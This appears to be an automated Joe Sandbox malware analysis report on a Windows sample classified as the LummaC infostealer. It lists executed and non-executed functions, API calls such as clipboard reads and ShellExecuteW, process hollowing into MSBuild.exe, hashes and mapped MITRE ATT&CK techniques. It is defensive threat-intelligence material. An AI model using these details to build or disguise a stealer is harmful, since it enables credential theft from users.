Source File: 00000000.00000002.2128857646.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true

Associated: 00000000.00000002.2128831288.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128895970.0000000000EE3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2128934236.0000000000EED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129002006.0000000000F45000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129029584.0000000000F46000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2129054004.0000000000F48000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ec0000_TuQlz67byH.jbxd

Yara matches

Similarity

API ID: CommandLine
String ID: &s
API String ID: 3253501508-4007868222
Opcode ID: 1c3c30c80dbf1c0f4092cc9fc8154edfa5b9c5af01845628030a981ef9593e3b
Instruction ID: 17b3d597029e6c33e649f697448dcf94e114bb9602cdb7060996dea2b093051b
Opcode Fuzzy Hash: 1c3c30c80dbf1c0f4092cc9fc8154edfa5b9c5af01845628030a981ef9593e3b
Instruction Fuzzy Hash: B8B0487C80A3488F8700AF31A98C0243EA0B3292023C00499AC0197224DB380908AE04

Analysis Process: MSBuild.exePID: 2580, Parent PID: 3548COMMON

Execution Graph

Execution Coverage:	1%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	2.5%
Total number of Nodes:	40
Total number of Limit Nodes:	4

Executed Functions

Function 0040D110 Relevance: 6.2, APIs: 4, Instructions: 154
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetInputState.USER32 ref: 0040D121
GetCurrentThreadId.KERNEL32 ref: 0040D136
GetCurrentProcessId.KERNEL32 ref: 0040D13C
ExitProcess.KERNEL32 ref: 0040D2F0

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CurrentProcess$ExitInputStateThread
String ID:
API String ID: 1029096631-0
Opcode ID: 08eb499608fb6ca27a79879cc2e31d82174a6a7722ca31d8a5ded37d06d49044
Instruction ID: f02d3b79713e8d81e15a0fda541fde84aa13a8de9f5ea14ec3edbee07005130c
Opcode Fuzzy Hash: 08eb499608fb6ca27a79879cc2e31d82174a6a7722ca31d8a5ded37d06d49044
Instruction Fuzzy Hash: BD41697480D340ABC301BFA5D644A1EFBF1AF56709F048C6DE5C4A7292C339D8189B6B

Function 00445700 Relevance: 1.6, APIs: 1, Instructions: 69
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00445784

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 451ba736794f0e2f30a849843ab83a7da9f20e1e8286aac8e33d1c41455145f3
Instruction ID: c85136016a5953b7558c7414a3c459db971abdd3e4f37367334958bb3d5b1fc4
Opcode Fuzzy Hash: 451ba736794f0e2f30a849843ab83a7da9f20e1e8286aac8e33d1c41455145f3
Instruction Fuzzy Hash: DF119E7191C240EBD711AF28E840A1BBBF5AF86716F05883DE4C49B212D339D811CB9B

Function 00445BB0 Relevance: 1.5, APIs: 1, Instructions: 14
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL(0044973D,005C003F,00000006,?,?,00000018,8C8D8A8B,?,?), ref: 00445BDE

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 00445DCE Relevance: 3.0, APIs: 2, Instructions: 17
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 00445DCE
GetForegroundWindow.USER32 ref: 00445DE0

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 8c61841407d1a4852bfe4b40972173754e0679736d2baf3d56bf65322f3b4ff0
Instruction ID: 1e21c31d78f88c29f1ba1c45ad2c8465459836b227478d43c99d9611323569fd
Opcode Fuzzy Hash: 8c61841407d1a4852bfe4b40972173754e0679736d2baf3d56bf65322f3b4ff0
Instruction Fuzzy Hash: 11D05EE9A023405BEA08AB22FC0E4173615A78626E7040438E80B82312E535E924C64A

Function 00443220 Relevance: 1.6, APIs: 1, Instructions: 59
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000), ref: 004432A6

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 50965382f7edf395daec22a3aa5bcca61c8fe5508095e75f982d05b7b9ec31b6
Instruction ID: 4bd1cfedf901e7341f085caf0d3c231c399316e56ace865125bd700590354386
Opcode Fuzzy Hash: 50965382f7edf395daec22a3aa5bcca61c8fe5508095e75f982d05b7b9ec31b6
Instruction Fuzzy Hash: 4B016D3450D3409BD701EF18E845A1ABBE8EF4AB02F054D6CE5C58B362D339DD60CB96

Function 00443202 Relevance: 1.5, APIs: 1, Instructions: 6
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 00443208

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f4e883208b5af43432b1f7820fa52118579d54aaadfbe7b6ea97085ba09a0524
Instruction ID: d989c2ef34d315249fff67303ad5b66d5fc7957262475763486a37997b8dd8e1
Opcode Fuzzy Hash: f4e883208b5af43432b1f7820fa52118579d54aaadfbe7b6ea97085ba09a0524
Instruction Fuzzy Hash: CCB012304401005FDA141B00EC0AF003510EF00606F800070A100040B2D1619864C559

Non-executed Functions

Function 00429510 Relevance: 30.2, APIs: 1, Strings: 16, Instructions: 426COMMON

Download Yara Rule

Strings

pq, xrefs: 004299E0
G+X5, xrefs: 00429AF3
B?Q9, xrefs: 00429B0B
X/R), xrefs: 00429AEB
L3Y=, xrefs: 00429B03
8;, xrefs: 00429B13
!E4G, xrefs: 00429836
z=Q?, xrefs: 00429826
O+f), xrefs: 00429634, 0042963D
;IJK, xrefs: 0042983E
T#a-, xrefs: 00429AE3
B7U1, xrefs: 00429AFB
?M0K, xrefs: 00429968
2A"_, xrefs: 00429980
G'M!, xrefs: 00429ADB
,A&C, xrefs: 0042982E

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: !E4G$,A&C$2A"_$8;$;IJK$?M0K$B7U1$B?Q9$G'M!$G+X5$L3Y=$O+f)$T#a-$X/R)$pq$z=Q?
API String ID: 0-655414846
Opcode ID: 821277b00644bb46f69b775215d578a60cf2f50154e1c4f07745e3abcf78f76a
Instruction ID: 614779ad590eebcf7b8fe37e51d599c86efeb38568f1612107a067b093dacd9a
Opcode Fuzzy Hash: 821277b00644bb46f69b775215d578a60cf2f50154e1c4f07745e3abcf78f76a
Instruction Fuzzy Hash: 56F130B4608380ABD310DF15E881A2BBBF4FB86748F944D1DF4D59B252D378D908CB9A

Function 00438720 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 115clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00438738
GetWindowLongW.USER32 ref: 00438763
GetClipboardData.USER32 ref: 00438773
CloseClipboard.USER32 ref: 00438880

Strings

9, xrefs: 004387DD
8, xrefs: 004387E5
9, xrefs: 004387D1
6, xrefs: 004387D9
6, xrefs: 004387D5
?, xrefs: 004387C9
=, xrefs: 004387CD

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataLongOpenWindow
String ID: 6$6$8$9$9$=$?
API String ID: 1647500905-2499364611
Opcode ID: 7c9163cd6bc49d62cda3546406a8a3a59e414d7ee2d25f2b6b977c001a77ad7b
Instruction ID: c6cecdc6b357f73a091e8619202f080a94ed584840656985310604660298186b
Opcode Fuzzy Hash: 7c9163cd6bc49d62cda3546406a8a3a59e414d7ee2d25f2b6b977c001a77ad7b
Instruction Fuzzy Hash: F741B170C08385CFDB01AFB8D5893AEBFB0AB5A314F14092EE485A7381D7794949C76B

Function 0043F620 Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 452memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32 ref: 0043F67C
SysAllocString.OLEAUT32 ref: 0043F73C
VariantInit.OLEAUT32(00000000), ref: 0043F7BB
SysStringLen.OLEAUT32(?), ref: 0043F86B

Strings

hi, xrefs: 0043F6E6
dg, xrefs: 0043F7F5

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: String$Alloc$InitVariant
String ID: dg$hi
API String ID: 3520221836-2859417413
Opcode ID: a29f64484bac79c51184cc7e0d437789df3d7f91ec00fbc448bf7e6117096322
Instruction ID: 76cd35575ce81f92284fb50bd1b390108f3350da4718470232658bad10f85c67
Opcode Fuzzy Hash: a29f64484bac79c51184cc7e0d437789df3d7f91ec00fbc448bf7e6117096322
Instruction Fuzzy Hash: E9F18776608301EFE704CF24D881B2ABBF5FB8A355F14992EF485872A1C738D845CB1A

Function 004390EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00439124
GetSystemMetrics.USER32 ref: 00439133

Strings

, xrefs: 004391DE

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: ab5555a52b31076e5eeb6519deaae68eca3c41e93bfc72b6c9b35e59f4d21b4a
Instruction ID: 7f7dffd27c621b542e95bdab6b7ee4d7f31120e949507c5ac4fca7aa65185fb2
Opcode Fuzzy Hash: ab5555a52b31076e5eeb6519deaae68eca3c41e93bfc72b6c9b35e59f4d21b4a
Instruction Fuzzy Hash: 6C3160B49183048FDB00EF6CDA8565EBBF4BF89704F11492DE498DB360D775A948CB86

Function 00438220 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bdc841d7a406348b8f463a63eb878eabe2c962c804589a40256072bab34e7f2b
Instruction ID: 5feb4677dc7f436114534582e8c0716e72c97c069455e78d6c85f3d503c4cf0a
Opcode Fuzzy Hash: bdc841d7a406348b8f463a63eb878eabe2c962c804589a40256072bab34e7f2b
Instruction Fuzzy Hash: 4501E4B44107009FD360EF29C485747BBE8EB08714F008A1DE8AECB680D774A5448B82

Function 00439843 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00439891
GetSystemMetrics.USER32 ref: 004398A0

Strings

, xrefs: 00439974

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c81f12191cba6e53c0562e90626fcbcb1d354553d74947de8f13948612130a55
Instruction ID: eb4df33fe1d6a66542a4d5aad425eba8fef39bce69b1d50955d9d3d9aaf60553
Opcode Fuzzy Hash: c81f12191cba6e53c0562e90626fcbcb1d354553d74947de8f13948612130a55
Instruction Fuzzy Hash: 3B516DB4E142188FDB40EFACD985A9EBBF0BB48310F018529E898E7350D734A944CF96

Function 0040F1FB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,57A649BB,0044D58A,832F8123,00000000,00000005), ref: 0040F32F

Strings

PQ, xrefs: 0040F2BF
8@-, xrefs: 0040F33A

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ExecuteShell
String ID: 8@-$PQ
API String ID: 587946157-876866189
Opcode ID: 1a0b4a114143d5ca3374a3cd52da601592b1729854c1c1369e379120faed14fe
Instruction ID: 32a7b61192442560c6f92bb2f4be214f77c1956f3597500a90fccf8073e86402
Opcode Fuzzy Hash: 1a0b4a114143d5ca3374a3cd52da601592b1729854c1c1369e379120faed14fe
Instruction Fuzzy Hash: 5F312878A012689FDB208F94DD45BDEBB71BF46301F1408E9E689AA281C7B54E848F56

Function 00435551 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0043555A
VariantInit.OLEAUT32 ref: 00435566

Strings

2, xrefs: 004355B5

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: 2
API String ID: 2610073882-450215437
Opcode ID: 9656e49463a1eac2a2e27d608098374d928559fc5e9cd49b246a20351250d731
Instruction ID: 1309dba7e2d53283adf9958502b19f3f730abdb88899d5b7c892982ad23b04e6
Opcode Fuzzy Hash: 9656e49463a1eac2a2e27d608098374d928559fc5e9cd49b246a20351250d731
Instruction Fuzzy Hash: 6341D370108BC1CED722DF2CC494646BFA0AB56324F188A9CD8EA4F3DAC775E505CB62

Function 00435A84 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00435AA6
VariantInit.OLEAUT32 ref: 00435AB2

Strings

2, xrefs: 00435B01

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: 2
API String ID: 2610073882-450215437
Opcode ID: b9a854552b158eee2be1d84dc97acde07f31a6659becb1d60da7bb16dc3eeda4
Instruction ID: 10a0ad4f487e5ee891bf26f48cdc5f2681f831964d1233476b22d4ecaaddf2d0
Opcode Fuzzy Hash: b9a854552b158eee2be1d84dc97acde07f31a6659becb1d60da7bb16dc3eeda4
Instruction Fuzzy Hash: B141C570108BC18ED725CF2CC494656BFE0AB5A324F18868DE8EA8F3D6C775D506DB62

Function 00435A99 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 00435AA6
VariantInit.OLEAUT32 ref: 00435AB2

Strings

2, xrefs: 00435B01

Memory Dump Source

Source File: 00000002.00000002.2127612088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: 2
API String ID: 2610073882-450215437
Opcode ID: fb5371bdd09d0e906117c41cc88a3a5b350ebddee64f3fa9cb34d119133aa536
Instruction ID: e960a9e32f486725a985871b83e160e2d060c1978967536bf2cf05e5ffba8ce9
Opcode Fuzzy Hash: fb5371bdd09d0e906117c41cc88a3a5b350ebddee64f3fa9cb34d119133aa536
Instruction Fuzzy Hash: A831C320008BC18EDB229F3C8488646BFA05F27224F1887DDD8EA4F3DBC365D506DB66

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TuQlz67byH.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TuQlz67byH.exe_d76742b7c7eb12edef8869ab2eace6d431024f4_b43b274e_a43d26ab-ffb2-4ba1-9e25-7cc724e4c613\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER22C2.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2331.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER2380.tmp.xml

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Windows Analysis Report
TuQlz67byH.exe

Function 00EC2021 Relevance: 9.4, APIs: 1, Strings: 4, Instructions: 631
memoryCOMMON

Function 00ED8E2E Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 202
COMMON

Function 00EDA3A6 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 177
COMMON

Function 00ED6368 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMONLIBRARYCODE

Function 00ED9FAA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 147
COMMON